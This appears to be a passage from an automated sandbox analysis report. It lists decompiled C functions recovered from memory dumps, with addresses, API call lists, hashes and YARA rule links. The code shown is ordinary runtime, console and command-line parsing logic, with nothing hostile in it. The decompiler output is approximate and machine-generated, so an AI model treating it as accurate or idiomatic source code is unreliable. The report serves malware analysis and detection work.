                                0x4a5587c3
                                0x4a5587cc
                                0x4a5587d2
                                0x4a5587d8
                                0x4a5587da
                                0x4a5587e0
                                0x4a5587e6
                                0x4a5587e8
                                0x4a5587f4
                                0x4a56bc6a
                                0x4a56bc70
                                0x4a5587fa
                                0x4a558801

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __p__commode__p__fmode__set_app_type
                                • String ID:
                                • API String ID: 3338496922-0
                                • Opcode ID: 46f97d04214fa5e71b1e3bd79695945c832887b3956fcf0822f6b1805ba42c4f
                                • Instruction ID: 7cea297815f6a8ff86bd9b3026e42cbff8e40cfaed13139aaca357a3dd8e38d8
                                • Opcode Fuzzy Hash: 46f97d04214fa5e71b1e3bd79695945c832887b3956fcf0822f6b1805ba42c4f
                                • Instruction Fuzzy Hash: AF1160B0952201DFE319AF60C7596553BB8FF02325F120D7BD022CA9BDEB74A880EB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A560AF9, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A560AF9(struct _COORD _a4, short _a6) {
				long _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* _t20;
				int _t27;
				void* _t30;

				_t27 = _a4;
				if(((_t27 >> 0x00000004 ^ _t27) & 0x0000000f) == 0) {
					return 1;
				}
				_t30 = GetStdHandle(0xfffffff5);
				if(GetConsoleScreenBufferInfo(_t30,  &_v32) == 0) {
					_t20 = 1;
				} else {
					_a6 = 0;
					_a4.X = 0;
					FillConsoleOutputAttribute(_t30, _t27, _v32.dwSize * _v30, _a4,  &_v8);
					SetConsoleTextAttribute(_t30, _t27);
					_t20 = 0;
				}
				return _t20;
			}









                                0x4a560b02
                                0x4a560b0e
                                0x00000000
                                0x4a567cbe
                                0x4a560b1d
                                0x4a560b2c
                                0x4a560b65
                                0x4a560b2e
                                0x4a560b34
                                0x4a560b38
                                0x4a560b4d
                                0x4a560b55
                                0x4a560b5b
                                0x4a560b5b
                                0x00000000

                                APIs
                                • GetStdHandle.KERNEL32(000000F5,?,00000104,?,?,?,?,4A560995,00000000,00000001), ref: 4A560B17
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A560B24
                                • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,?,00000000,00000001), ref: 4A560B4D
                                • SetConsoleTextAttribute.KERNEL32(00000000,00000000), ref: 4A560B55
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                • String ID:
                                • API String ID: 1033415088-0
                                • Opcode ID: ea9170fbe8b7845710039d99a77d218dc3362595d851dbf1ba96c2c6712c3e47
                                • Instruction ID: 142e45aaae06802411b080602c5d95183c82d5b43ff22850578c8e35eba4efea
                                • Opcode Fuzzy Hash: ea9170fbe8b7845710039d99a77d218dc3362595d851dbf1ba96c2c6712c3e47
                                • Instruction Fuzzy Hash: 7101AD72510109BA9B01BFA4CD88AEF7FBCEF0A759B008522F919D6060E634CA42C3A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A554490, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                Download Yara Rule
                                C-Code - Quality: 19%
                                			E4A554490(void* __eax, intOrPtr _a4) {
				long _v8;
				void* _t5;
				intOrPtr _t9;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;

				__imp___get_osfhandle(_a4, _t18, _t16);
				_t19 = __eax;
				if(__eax == 0xffffffff || (GetFileType(__eax) & 0xffff7fff) != 2) {
					L2:
					_t5 = 0;
				} else {
					_t9 = _a4;
					if(_t9 == 0) {
						_push(0xfffffff6);
						goto L7;
					} else {
						_t14 = _t9 - 1;
						if(_t14 != 0) {
							if(_t14 == 1) {
								_push(0xfffffff4);
								goto L7;
							}
						} else {
							_push(0xfffffff5);
							L7:
							_t19 = GetStdHandle();
						}
					}
					if(GetConsoleMode(_t19,  &_v8) == 0) {
						goto L2;
					} else {
						_t5 = 1;
					}
				}
				return _t5;
			}










                                0x4a55449a
                                0x4a5544a0
                                0x4a5544a6
                                0x4a5544b9
                                0x4a5544b9
                                0x4a5544c0
                                0x4a5544c3
                                0x4a5544c6
                                0x4a556d71
                                0x00000000
                                0x4a5544cc
                                0x4a5544cc
                                0x4a5544cd
                                0x4a556d64
                                0x4a556d6a
                                0x00000000
                                0x4a556d6a
                                0x4a5544d3
                                0x4a5544d3
                                0x4a5544d5
                                0x4a5544db
                                0x4a5544db
                                0x4a5544cd
                                0x4a5544ea
                                0x00000000
                                0x4a5544ec
                                0x4a5544ee
                                0x4a5544ee
                                0x4a5544ea
                                0x4a5544bd

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A55449A
                                • GetFileType.KERNEL32 ref: 4A5544A9
                                • GetStdHandle.KERNEL32(000000F5,?,4A5597DD,4A565268,00000000,766F14B9,00000000,?,?,?,?,?,hRVJ:#,4A556D61,?,00000002), ref: 4A5544D5
                                • GetConsoleMode.KERNEL32 ref: 4A5544E2
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleFileHandleModeType_get_osfhandle
                                • String ID:
                                • API String ID: 746850120-0
                                • Opcode ID: 47e273bcb66960d4efed89b653c077ba59c44f261d31398da22b2e58fc537055
                                • Instruction ID: 6637b3cb6c900f84b3b583b582ddf3a8c421c00bbac5e2b4c96dff02900da5c6
                                • Opcode Fuzzy Hash: 47e273bcb66960d4efed89b653c077ba59c44f261d31398da22b2e58fc537055
                                • Instruction Fuzzy Hash: 14F0C872055460FA9B106675CF0899A3EBDEE022B87154713F837D24ECEA348911C691
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56FCA6, Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E4A56FCA6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t2;

				_t2 = E4A5637A5(__ecx, __edi, __esi);
				__imp__longjmp(0x4a574b40, 1);
				asm("int3");
				if( *0x4a5740b4 == 0) {
					L7:
					__eax = E4A5637A5(__ecx, __edi, __esi);
					__imp__longjmp(0x4a574b40, 1);
					asm("int3");
					 *0x4a590924 =  *0x4a590924 & 0x00000000;
					 *0x4a5906a4 = 0;
					return __eax;
				} else {
					__eax = E4A56FE1B(__ebx, __ecx, __edx, __edi, 0, 0x237b, 0x2328);
					if(__eax != 1) {
						EnterCriticalSection( *0x4a5741a4);
						 *0x4a5741b4 =  *0x4a5741b4 & 0x00000000;
						LeaveCriticalSection( *0x4a5741a4);
						return _t2;
					} else {
						__esi =  *0x4a5740b4; // 0x0
						while(__esi != 0) {
							__eax = E4A5557F4(__eax, __esi);
							__esi =  *((intOrPtr*)(__esi + 0x110));
						}
						goto L7;
					}
				}
			}




                                0x4a56fca6
                                0x4a56fcb2
                                0x4a56fcb8
                                0x4a56fcc0
                                0x4a56fcf4
                                0x4a56fcf4
                                0x4a56fd00
                                0x4a56fd06
                                0x4a56fd0c
                                0x4a56fd13
                                0x4a56fd1a
                                0x4a56fcc2
                                0x4a56fcce
                                0x4a56fcd6
                                0x4a551e72
                                0x4a551e7e
                                0x4a551e85
                                0x4a551e8b
                                0x4a56fcdc
                                0x4a56fcdc
                                0x4a56fcf0
                                0x4a56fce5
                                0x4a56fcea
                                0x4a56fcea
                                0x00000000
                                0x4a56fcf0
                                0x4a56fcd6

                                APIs
                                • EnterCriticalSection.KERNEL32(4A55851C), ref: 4A551E72
                                • LeaveCriticalSection.KERNEL32(?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551E85
                                • longjmp.MSVCRT(4A574B40,00000001,4A563723,4A58C642,4A551BBC,4A58C642,00002002,4A57C640,00000000,00000000,4A551E56,4A551F9D,-00000003,4A574210,4A574210), ref: 4A56FCB2
                                • longjmp.MSVCRT(4A574B40,00000001,?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210), ref: 4A56FD00
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSectionlongjmp$EnterLeave
                                • String ID:
                                • API String ID: 4200650868-0
                                • Opcode ID: e39ab97db41e9bc321518732d7de0be8c12bb8aaf3cb95b0ca3e4605d8fdbdcd
                                • Instruction ID: 481c49594dc867417232b1d190b06c4363364e227267dae3f46155231e7f462e
                                • Opcode Fuzzy Hash: e39ab97db41e9bc321518732d7de0be8c12bb8aaf3cb95b0ca3e4605d8fdbdcd
                                • Instruction Fuzzy Hash: 67F054B4DCA201ABEA12BB60DB49B887E79BF42726F010412F604FE9E5CBB41D44C755
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02345CFA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                Download Yara Rule
                                C-Code - Quality: 95%
                                			E02345CFA(void* __edx, void* __edi, signed int __esi, signed int _a4, signed int _a8, signed char _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				signed char _v40;
				void* __ebx;
				intOrPtr* _t117;
				signed int _t118;
				void* _t119;
				intOrPtr _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				void* _t141;
				void* _t143;
				signed char _t144;
				signed int _t145;
				signed int _t148;
				signed int _t149;
				intOrPtr* _t151;
				signed char _t153;
				signed int _t160;
				void* _t162;
				signed char _t163;
				void* _t167;
				signed int _t168;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t176;

				_t173 = __esi;
				_t167 = __edi;
				_t162 = __edx;
				_t151 = _a8;
				_t117 = _a4;
				_t148 = 0;
				if(_t151 != 0) {
					 *_t151 = _t117;
				}
				if(_t117 != _t148) {
					__eflags = _a12 - _t148;
					if(_a12 == _t148) {
						L7:
						_push(_t173);
						_push(_t167);
						_v20 = _t148;
						_v16 = _t148;
						_v5 =  *_t117;
						_t9 = _t117 + 1; // 0x1
						_t168 = _t9;
						while(1) {
							_t118 = _v5 & 0x000000ff;
							_t173 = _t173 | 0xffffffff;
							__eflags = _t118 - _t173;
							if(_t118 != _t173) {
								_t173 = _t118;
							}
							_t119 = E022D0867();
							_t163 = 8;
							__eflags =  *(_t119 + _t173 * 2) & _t163;
							if(( *(_t119 + _t173 * 2) & _t163) == 0) {
								break;
							} else {
								goto L11;
							}
							do {
								L11:
								_t145 =  *_t168;
								_t168 = _t168 + 1;
								__eflags = _t145 - _v5;
							} while (_t145 == _v5);
							_v5 = _t145;
						}
						__eflags = _v5 - 0x2d;
						_v12 = _t168;
						if(_v5 != 0x2d) {
							__eflags = _v5 - 0x2b;
							if(_v5 != 0x2b) {
								L17:
								_t153 = 0x10;
								__eflags = _a12 - _t148;
								if(_a12 != _t148) {
									L24:
									__eflags = _a12 - _t153;
									if(_a12 != _t153) {
										L29:
										asm("cdq");
										_t169 = _a12;
										_v40 = _t163;
										_t121 = E0229F920(0xffffffff, 0xffffffff, _a12, _t163);
										_v36 = _t153;
										_v32 = _t148;
										_v28 = _t121;
										_v24 = _t163;
										while(1) {
											_t174 = _v5 & 0x000000ff;
											_t148 = _t148 | 0xffffffff;
											__eflags = _t174 - _t148;
											if(_t174 != _t148) {
												_t148 = _t174;
											}
											_t122 = E022D0867();
											__eflags =  *(_t122 + _t148 * 2) & 0x00000004;
											if(( *(_t122 + _t148 * 2) & 0x00000004) == 0) {
												goto L34;
											}
											_t176 = _v5 - 0x30;
											L40:
											__eflags = _t176 - _a12;
											if(_t176 >= _a12) {
												L50:
												_t149 = _a16;
												_v12 = _v12 - 1;
												__eflags = _t149 & 0x00000008;
												if((_t149 & 0x00000008) != 0) {
													__eflags = _t149 & 0x00000004;
													if((_t149 & 0x00000004) != 0) {
														L66:
														 *0x23792c4 = 0x22;
														__eflags = _t149 & 0x00000001;
														if((_t149 & 0x00000001) == 0) {
															__eflags = _t149 & 0x00000002;
															if((_t149 & 0x00000002) == 0) {
																_t104 =  &_v20;
																 *_t104 = _v20 | 0xffffffff;
																__eflags =  *_t104;
																_v16 = 0x7fffffff;
															} else {
																_v20 = _v20 & 0x00000000;
																_v16 = 0x80000000;
															}
														} else {
															_v20 = _v20 | 0xffffffff;
															_v16 = _v16 | 0xffffffff;
														}
														L71:
														_t124 = _a8;
														__eflags = _t124;
														if(_t124 != 0) {
															 *_t124 = _v12;
														}
														__eflags = _t149 & 0x00000002;
														if((_t149 & 0x00000002) != 0) {
															asm("adc ecx, 0x0");
															_v20 =  ~_v20;
															_v16 =  ~_v16;
														}
														_t125 = _v20;
														L76:
														return _t125;
													}
													__eflags = _t149 & 0x00000001;
													if((_t149 & 0x00000001) != 0) {
														goto L71;
													}
													_t129 = _t149 & 0x00000002;
													__eflags = _t129;
													if(_t129 == 0) {
														L62:
														__eflags = _t129;
														if(_t129 != 0) {
															goto L71;
														}
														__eflags = _v16 - 0x7fffffff;
														if(__eflags < 0) {
															goto L71;
														}
														if(__eflags > 0) {
															goto L66;
														}
														__eflags = _v20 - 0xffffffff;
														if(_v20 <= 0xffffffff) {
															goto L71;
														}
														goto L66;
													}
													__eflags = _v16 - 0x80000000;
													if(__eflags > 0) {
														goto L66;
													}
													if(__eflags < 0) {
														goto L62;
													}
													__eflags = _v20;
													if(_v20 > 0) {
														goto L66;
													}
													goto L62;
												}
												__eflags = _a8;
												if(_a8 != 0) {
													_v12 = _a4;
												}
												_v20 = 0;
												_v16 = 0;
												goto L71;
											}
											_t160 = _v16;
											_a16 = _a16 | 0x00000008;
											__eflags = _t160 - _v24;
											if(__eflags < 0) {
												L54:
												_t135 = E022BF1E0(_t169, _v40, _v20, _t160) + _t176;
												__eflags = _t135;
												asm("adc edx, ecx");
												_v20 = _t135;
												_v16 = _t163;
												L55:
												_v12 = _v12 + 1;
												_v5 =  *_v12;
												continue;
											}
											if(__eflags > 0) {
												L44:
												__eflags = _v20 - _v28;
												if(_v20 != _v28) {
													L49:
													_a16 = _a16 | 0x00000004;
													__eflags = _a8;
													if(_a8 != 0) {
														goto L55;
													}
													goto L50;
												}
												__eflags = _t160 - _v24;
												if(_t160 != _v24) {
													goto L49;
												}
												__eflags = 0 - _v32;
												if(__eflags < 0) {
													goto L54;
												}
												if(__eflags > 0) {
													goto L49;
												}
												__eflags = _t176 - _v36;
												if(_t176 <= _v36) {
													goto L54;
												}
												goto L49;
											}
											__eflags = _v20 - _v28;
											if(_v20 < _v28) {
												goto L54;
											}
											goto L44;
											L34:
											__eflags = _t174 - 0xffffffff;
											if(_t174 == 0xffffffff) {
												_t174 = _t174;
												__eflags = _t174;
											}
											_t123 = E022D0867();
											__eflags =  *(_t123 + _t174 * 2) & 0x00000103;
											if(( *(_t123 + _t174 * 2) & 0x00000103) == 0) {
												goto L50;
											} else {
												__eflags = _v5 - 0x61 - 0x19;
												_t133 = _v5;
												if(_v5 - 0x61 <= 0x19) {
													_t133 = _t133 - 0x20;
													__eflags = _t133;
												}
												_t51 = _t133 - 0x37; // -44
												_t176 = _t51;
												goto L40;
											}
										}
									}
									__eflags = _v5 - 0x30;
									if(_v5 != 0x30) {
										goto L29;
									}
									_t141 =  *_t168;
									__eflags = _t141 - 0x78;
									if(_t141 == 0x78) {
										L28:
										_t171 = _t168 + 1;
										_t172 = _t171 + 1;
										__eflags = _t172;
										_v5 =  *_t171;
										_v12 = _t172;
										goto L29;
									}
									__eflags = _t141 - 0x58;
									if(_t141 != 0x58) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v5 - 0x30;
								if(_v5 == 0x30) {
									_t143 =  *_t168;
									__eflags = _t143 - 0x78;
									if(_t143 == 0x78) {
										L23:
										_a12 = _t153;
										goto L24;
									}
									__eflags = _t143 - 0x58;
									if(_t143 == 0x58) {
										goto L23;
									}
									_a12 = _t163;
									goto L29;
								}
								_a12 = 0xa;
								goto L29;
							}
							L16:
							_t144 =  *_t168;
							_t168 = _t168 + 1;
							__eflags = _t168;
							_v12 = _t168;
							_v5 = _t144;
							goto L17;
						}
						_a16 = _a16 | 0x00000002;
						goto L16;
					}
					__eflags = _a12 - 2;
					if(_a12 < 2) {
						goto L3;
					}
					__eflags = _a12 - 0x24;
					if(_a12 > 0x24) {
						goto L3;
					}
					goto L7;
				}
				L3:
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				_push(_t148);
				E0231CECC(_t148, _t151, _t162, _t167, _t173);
				_t125 = 0;
				goto L76;
			}










































                                0x02345cfa
                                0x02345cfa
                                0x02345cfa
                                0x02345cff
                                0x02345d02
                                0x02345d09
                                0x02345d0d
                                0x02345d0f
                                0x02345d0f
                                0x02345d13
                                0x02345d2b
                                0x02345d2e
                                0x02345d3c
                                0x02345d3e
                                0x02345d3f
                                0x02345d40
                                0x02345d43
                                0x02345d46
                                0x02345d49
                                0x02345d49
                                0x02345d4c
                                0x02345d4c
                                0x02345d50
                                0x02345d53
                                0x02345d55
                                0x02345d57
                                0x02345d57
                                0x02345d59
                                0x02345d60
                                0x02345d61
                                0x02345d64
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345d66
                                0x02345d66
                                0x02345d66
                                0x02345d68
                                0x02345d69
                                0x02345d69
                                0x02345d6e
                                0x02345d6e
                                0x02345d73
                                0x02345d77
                                0x02345d7a
                                0x02345d82
                                0x02345d86
                                0x02345d91
                                0x02345d93
                                0x02345d94
                                0x02345d97
                                0x02345dba
                                0x02345dba
                                0x02345dbd
                                0x02345dd9
                                0x02345ddc
                                0x02345dde
                                0x02345de5
                                0x02345de8
                                0x02345ded
                                0x02345df0
                                0x02345df3
                                0x02345df6
                                0x02345df9
                                0x02345df9
                                0x02345dfd
                                0x02345e00
                                0x02345e02
                                0x02345e04
                                0x02345e04
                                0x02345e06
                                0x02345e0b
                                0x02345e0f
                                0x00000000
                                0x00000000
                                0x02345e15
                                0x02345e44
                                0x02345e44
                                0x02345e47
                                0x02345e84
                                0x02345e84
                                0x02345e87
                                0x02345e8c
                                0x02345e8f
                                0x02345edc
                                0x02345edf
                                0x02345f0b
                                0x02345f0b
                                0x02345f15
                                0x02345f18
                                0x02345f24
                                0x02345f27
                                0x02345f32
                                0x02345f32
                                0x02345f32
                                0x02345f36
                                0x02345f29
                                0x02345f29
                                0x02345f2d
                                0x02345f2d
                                0x02345f1a
                                0x02345f1a
                                0x02345f1e
                                0x02345f1e
                                0x02345f39
                                0x02345f39
                                0x02345f3c
                                0x02345f3e
                                0x02345f43
                                0x02345f43
                                0x02345f45
                                0x02345f48
                                0x02345f52
                                0x02345f57
                                0x02345f5a
                                0x02345f5a
                                0x02345f5d
                                0x02345f63
                                0x02345f65
                                0x02345f65
                                0x02345ee1
                                0x02345ee4
                                0x00000000
                                0x00000000
                                0x02345ee8
                                0x02345ee8
                                0x02345eeb
                                0x02345efa
                                0x02345efa
                                0x02345efc
                                0x00000000
                                0x00000000
                                0x02345efe
                                0x02345f01
                                0x00000000
                                0x00000000
                                0x02345f03
                                0x00000000
                                0x00000000
                                0x02345f05
                                0x02345f09
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345f09
                                0x02345eed
                                0x02345ef0
                                0x00000000
                                0x00000000
                                0x02345ef2
                                0x00000000
                                0x00000000
                                0x02345ef4
                                0x02345ef8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345ef8
                                0x02345e93
                                0x02345e96
                                0x02345e9b
                                0x02345e9b
                                0x02345e9e
                                0x02345ea1
                                0x00000000
                                0x02345ea1
                                0x02345e49
                                0x02345e4c
                                0x02345e50
                                0x02345e53
                                0x02345ea9
                                0x02345eb8
                                0x02345eb8
                                0x02345eba
                                0x02345ebc
                                0x02345ebf
                                0x02345ec2
                                0x02345ec7
                                0x02345eca
                                0x00000000
                                0x02345eca
                                0x02345e55
                                0x02345e5f
                                0x02345e62
                                0x02345e65
                                0x02345e7a
                                0x02345e7a
                                0x02345e7e
                                0x02345e82
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345e82
                                0x02345e67
                                0x02345e6a
                                0x00000000
                                0x00000000
                                0x02345e6e
                                0x02345e71
                                0x00000000
                                0x00000000
                                0x02345e73
                                0x00000000
                                0x00000000
                                0x02345e75
                                0x02345e78
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345e78
                                0x02345e5a
                                0x02345e5d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345e1a
                                0x02345e1a
                                0x02345e1d
                                0x02345e1f
                                0x02345e1f
                                0x02345e1f
                                0x02345e21
                                0x02345e2b
                                0x02345e2f
                                0x00000000
                                0x02345e31
                                0x02345e36
                                0x02345e38
                                0x02345e3c
                                0x02345e3e
                                0x02345e3e
                                0x02345e3e
                                0x02345e41
                                0x02345e41
                                0x00000000
                                0x02345e41
                                0x02345e2f
                                0x02345df9
                                0x02345dbf
                                0x02345dc3
                                0x00000000
                                0x00000000
                                0x02345dc5
                                0x02345dc7
                                0x02345dc9
                                0x02345dcf
                                0x02345dcf
                                0x02345dd2
                                0x02345dd2
                                0x02345dd3
                                0x02345dd6
                                0x00000000
                                0x02345dd6
                                0x02345dcb
                                0x02345dcd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345dcd
                                0x02345d99
                                0x02345d9d
                                0x02345da8
                                0x02345daa
                                0x02345dac
                                0x02345db7
                                0x02345db7
                                0x00000000
                                0x02345db7
                                0x02345dae
                                0x02345db0
                                0x00000000
                                0x00000000
                                0x02345db2
                                0x00000000
                                0x02345db2
                                0x02345d9f
                                0x00000000
                                0x02345d9f
                                0x02345d88
                                0x02345d88
                                0x02345d8a
                                0x02345d8a
                                0x02345d8b
                                0x02345d8e
                                0x00000000
                                0x02345d8e
                                0x02345d7c
                                0x00000000
                                0x02345d7c
                                0x02345d30
                                0x02345d34
                                0x00000000
                                0x00000000
                                0x02345d36
                                0x02345d3a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02345d3a
                                0x02345d15
                                0x02345d15
                                0x02345d16
                                0x02345d17
                                0x02345d18
                                0x02345d19
                                0x02345d1a
                                0x02345d22
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: $$0
                                • API String ID: 1302938615-389342756
                                • Opcode ID: 479ca11dc948d2f02b1627e28c7d11ed76c8bec2fd66642e37524445f9991eea
                                • Instruction ID: a8e9062ab5e413ed8b0ae62befdec7f19f122fe5f2b8ff1ad7e744c1474387fc
                                • Opcode Fuzzy Hash: 479ca11dc948d2f02b1627e28c7d11ed76c8bec2fd66642e37524445f9991eea
                                • Instruction Fuzzy Hash: 09919D70D0438AEFDF24CFA884843EDBBF1AF22714F9446DAD4A1A7291CB746685CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5522CA, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E4A5522CA(signed short* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t76;
				intOrPtr _t79;
				signed short _t81;
				long _t82;
				signed int _t89;
				void* _t95;
				long _t96;
				void* _t100;
				signed int _t111;
				intOrPtr _t120;
				signed int _t121;
				signed short* _t123;
				signed int _t128;

				_t76 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t76 ^ _t128;
				_t123 = _a4;
				_v220 = _a8;
				if(_t123 == 0) {
					_t79 = E4A552041(4);
					goto L28;
				} else {
					__eax = __esi;
					_t15 = __eax + 2; // 0x2
					__edx = _t15;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
					} while (__cx != 0);
					__eax = __eax - __edx;
					_push(__ebx);
					__eax = __eax >> 1;
					_push(__edi);
					__eax = 4 + __eax * 4;
					__eax = E4A552041(__eax);
					_v228 = __eax;
					_v212 = __eax;
					__edi = 0;
					_v216 = 0x4a574670;
					do {
						__eax = _v216;
						__ebx =  *_v216 & 0x0000ffff;
						if(__bx == 0) {
							break;
						}
						if(E4A5518EB(_v220, __ebx) == 0) {
							 *((short*)(__ebp + __edi * 2 - 0xcc)) = __bx;
							__edi = __edi + 1;
						}
						_v216 = _v216 + 2;
					} while (__edi < 0x63);
					__eax = 0;
					 *((short*)(__ebp + __edi * 2 - 0xcc)) = __ax;
					__eax = 1;
					_v224 = 1;
					_v216 = 1;
					while(1) {
						_t82 =  *_t123 & 0x0000ffff;
						if(_t82 == 0) {
							break;
						}
						if(_t82 == 0x22 || iswspace(_t82) == 0 && E4A5518EB( &_v208,  *_t123 & 0x0000ffff) == 0) {
							L17:
							_v224 = _v224 & 0x00000000;
							if(_v220 == 0 || E4A5518EB(_v220,  *_t123 & 0x0000ffff) == 0) {
								_v212 = _v212 + 2;
								 *_v212 =  *_t123;
								if( *_t123 == 0x22) {
									while(1) {
										_v212 = _v212 + 2;
										_t123 =  &(_t123[1]);
										 *_v212 =  *_t123;
										_t89 =  *_t123 & 0x0000ffff;
										if(_t89 == 0) {
											break;
										}
										if(_t89 == 0x22 || _t123[1] == 0) {
											if( *_t123 != 0) {
												goto L20;
											}
											break;
										} else {
											continue;
										}
									}
									_t123 = _t123;
								}
								L20:
								_v216 = _v216 & 0x00000000;
								L21:
								_t123 =  &(_t123[1]);
								continue;
							} else {
								goto L1;
							}
						} else {
							_t111 = _a12;
							if((_t111 & 0x00000001) != 0) {
								if(_v224 == 0) {
									goto L17;
								}
							}
							_t111 = _t111 & 0x00000002;
							if(_t111 == 0 || E4A5518EB(_v220,  *_t123 & 0x0000ffff) == 0) {
								_t121 = _a12 & 0x00000004;
								if(_t121 != 0) {
									_t95 = E4A5518EB(_v220,  *_t123 & 0x0000ffff);
									if(_t95 == 0) {
										goto L26;
									}
									goto L17;
								}
								L26:
								_t96 =  *_t123 & 0x0000ffff;
								if(_t96 != 0) {
									while(_t96 != 0x22 && (iswspace(_t96) != 0 || E4A5518EB( &_v208,  *_t123 & 0x0000ffff) != 0) && (_t111 == 0 || E4A5518EB(_v220,  *_t123 & 0x0000ffff) == 0)) {
										if(_t121 != 0) {
											_t100 = E4A5518EB(_v220,  *_t123 & 0x0000ffff);
											if(_t100 == 0) {
												goto L39;
											}
											break;
										}
										L39:
										_t123 =  &(_t123[1]);
										_t96 =  *_t123 & 0x0000ffff;
										if(_t96 != 0) {
											continue;
										}
										break;
									}
									if( *_t123 == 0) {
										break;
									}
									if(_v224 == 0 && _v216 == 0) {
										_v212 = _v212 + 2;
									}
									_v216 = 1;
									goto L17;
								}
								break;
							} else {
								goto L17;
							}
						}
					}
					_t79 = E4A55250F(_t111, _t120, _t121, _v228, (_v212 - _v228 >> 1) + (_v212 - _v228 >> 1) + 4);
					_pop(_t121);
					_pop(_t111);
					L28:
					return E4A5513A9(_t79, _t111, _v8 ^ _t128, _t120, _t121, _t123);
				}
				L1:
				if((_a12 & 0x00000002) != 0) {
					_t81 =  *_t123;
					if(_v216 == 0) {
						_v212 = _v212 + 2;
					}
					_v212 = _v212 + 2;
					 *_v212 = _t81;
					_v216 = 1;
					L4:
					_v212 = _v212 + 2;
					goto L21;
				}
				if((_a12 & 0x00000004) != 0) {
					 *_v212 =  *_t123;
				}
				_v216 = _v216 & 0x00000000;
				goto L4;
			}



























                                0x4a5522d5
                                0x4a5522dc
                                0x4a5522e3
                                0x4a5522e6
                                0x4a5522ee
                                0x4a556cff
                                0x00000000
                                0x4a5522f4
                                0x4a5522f4
                                0x4a5522f6
                                0x4a5522f6
                                0x4a5522f9
                                0x4a5522f9
                                0x4a5522fc
                                0x4a5522fd
                                0x4a5522fe
                                0x4a552303
                                0x4a552305
                                0x4a552306
                                0x4a552308
                                0x4a552309
                                0x4a552311
                                0x4a552316
                                0x4a55231c
                                0x4a552322
                                0x4a552324
                                0x4a55232e
                                0x4a55232e
                                0x4a552334
                                0x4a55233a
                                0x00000000
                                0x00000000
                                0x4a55234a
